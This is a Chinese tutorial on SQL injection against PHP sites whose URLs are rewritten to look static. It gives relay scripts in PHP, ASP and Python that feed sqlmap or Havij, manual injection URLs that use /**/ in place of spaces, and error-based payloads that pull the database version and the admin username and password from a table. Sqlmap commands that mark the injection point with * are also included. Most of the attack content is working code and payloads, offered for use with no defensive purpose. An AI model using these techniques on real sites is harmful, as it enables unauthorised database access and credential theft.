本文实例讲述了PHP针对伪静态的注入。分享给大家供大家参考,具体如下:
一:中转注入法
1.通过http://www.xxx.com/news.php?id=1做了伪静态之后就成这样了
http://www.xxx.com/news.php/id/1.html
2.测试步骤:
中转注入的php代码:inject.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
<?php set_time_limit(0); $id = $_GET [ "id" ]; $id = str_replace (” “,”%20″, $id ); $id = str_replace (“=”,”%3D”, $id ); //$url = "http://www.xxx.com/news.php/id/$id.html"; $url = "http://www.xxx.com/news.php/id/$id.html" ; //echo $url; $ch = curl_init(); curl_setopt( $ch , CURLOPT_URL, "$url" ); curl_setopt( $ch , CURLOPT_RETURNTRANSFER, 1); curl_setopt( $ch , CURLOPT_HEADER, 0); $output = curl_exec( $ch ); curl_close( $ch ); print_r( $output ); ?> |
3.本地环境搭建PHP,然后访问http://127.0.0.1/inject.php?id=1
通过sqlmap或者havj可以跑注入漏洞。
附录ASP中转代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
|
<% JmdcwName=request( "id" ) JmStr=JmdcwName JmStr=URLEncoding(JmStr) JMUrl= "http://192.168.235.7:8808/ad/blog/" //实际上要请求的网址 JMUrl=JMUrl & JmStr& ".html" //拼接url response.write JMUrl&JmStr //我这里故意输出url来看 'JmRef="http://127.0.0.1/6kbbs/bank.asp" JmCok= "" JmCok=replace(JmCok,chr(32), "%20" ) JmStr=URLEncoding(JmStr) response.write PostData(JMUrl,JmStr,JmCok,JmRef) //url,查询字符串,cookie,referer字段 Function PostData(PostUrl,PostStr,PostCok,PostRef) Dim Http Set Http = Server.CreateObject( "msxml2.serverXMLHTTP" ) With Http .Open "GET" ,PostUrl, False .Send () PostData = .ResponseBody End With Set Http = Nothing PostData =bytes2BSTR(PostData) End Function Function bytes2BSTR(vIn) //处理返回的信息 Dim strReturn Dim I, ThisCharCode, NextCharCode strReturn = "" For I = 1 To LenB(vIn) ThisCharCode = AscB(MidB(vIn, I, 1)) If ThisCharCode < &H80 Then strReturn = strReturn & Chr(ThisCharCode) Else NextCharCode = AscB(MidB(vIn, I + 1, 1)) strReturn = strReturn & Chr( CLng (ThisCharCode) * &H100 + CInt (NextCharCode)) I = I + 1 End If Next bytes2BSTR = strReturn End Function Function URLEncoding(vstrin) //发包前对参数的url编码一下 strReturn= "" Dim i 'vstrin=replace(vstrin,"%","%25") '增加转换搜索字符, 'vstrin=Replace(vstrin,chr(32),"%20") '转换空格,如果网站过滤了空格,尝试用/**/来代替%20 'vstrin=Replace(vstrin,chr(43),"%2B") 'JMDCW增加转换+字符 vstrin=Replace(vstrin,chr(32), "/**/" ) '在此增加要过滤的代码 //这里很关键,方便啊,把空格自动换成/**/,后面会说到的 For i=1 To Len(vstrin) ThisChr=Mid(vstrin,i,1) if Abs(Asc(ThisChr))< &HFF Then strReturn=strReturn & ThisChr Else InnerCode=Asc(ThisChr) If InnerCode<0 Then InnerCode=InnerCode + &H10000 End If Hight1=(InnerCode And &HFF00) \&HFF Low1=InnerCode And &HFF strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1) End if Next URLEncoding=strReturn End Function %> |
二、手工注入法
1.http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html/?772.html
2.测试注入:
http://www.xxx.com/down/html/?772′.html
http://www.xxx.com /play/Diablo'.html
http://www.xxx.com/play/Diablo'/**/and
/**/1='1 /*.html
http://www.xxx.com/play/Diablo'
/**/and
/**/1='2 /*.html
http://www.xxx.com/page/html/?56′/**/and/**/1=1/*.html 正常
http://www.xxx.com/page/html/?56′/**/and/**/1=2/*.html 出错
3.看页面是否存在差异,相同则不存在,不同存在注入。
4.联合查询:
http://www.xxx.com/play/diablo' and 1=2 union select 1,2… frominformation_schema.columns where 1='1.html
http://www.xxx.com/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
手工注入法(二)
http://www.xxx.net/news/html/?410.html
http://www.xxx.net/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html
注:
伪静态的注入和URL的普通GET注入不太相同
。普通url的get注入的%20,%23,+等都可以用;但是伪静态不行,会被直接传递到到url中,所以用/**/这个注释符号表示空格。
三、SQLmap方法
在sqlmap中伪静态哪儿存在注入点就加*
http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u “http://www.xxx.com/id1/1*/id2/2″
http://www.xxx.com/news/class/?103.htm
python sqlmap.py -u “http://www.xxx.com/news/class/?103*.html”
四、python脚本方法
代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
from BaseHTTPServer import * import urllib2 class MyHTTPHandler(BaseHTTPRequestHandler): def do_GET( self ): path = self .path path = path[path.find( 'id=' ) + 3 :] proxy_support = urllib2.ProxyHandler({ "http" : "http://127.0.0.1:8087" }) opener = urllib2.build_opener(proxy_support) urllib2.install_opener(opener) url = "http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/" try : response = urllib2.urlopen(url + path) html = response.read() except urllib2.URLError,e: html = e.read() self .wfile.write(html) server = HTTPServer(("", 8000 ), MyHTTPHandler) server.serve_forever() |
希望本文所述对大家PHP程序设计有所帮助。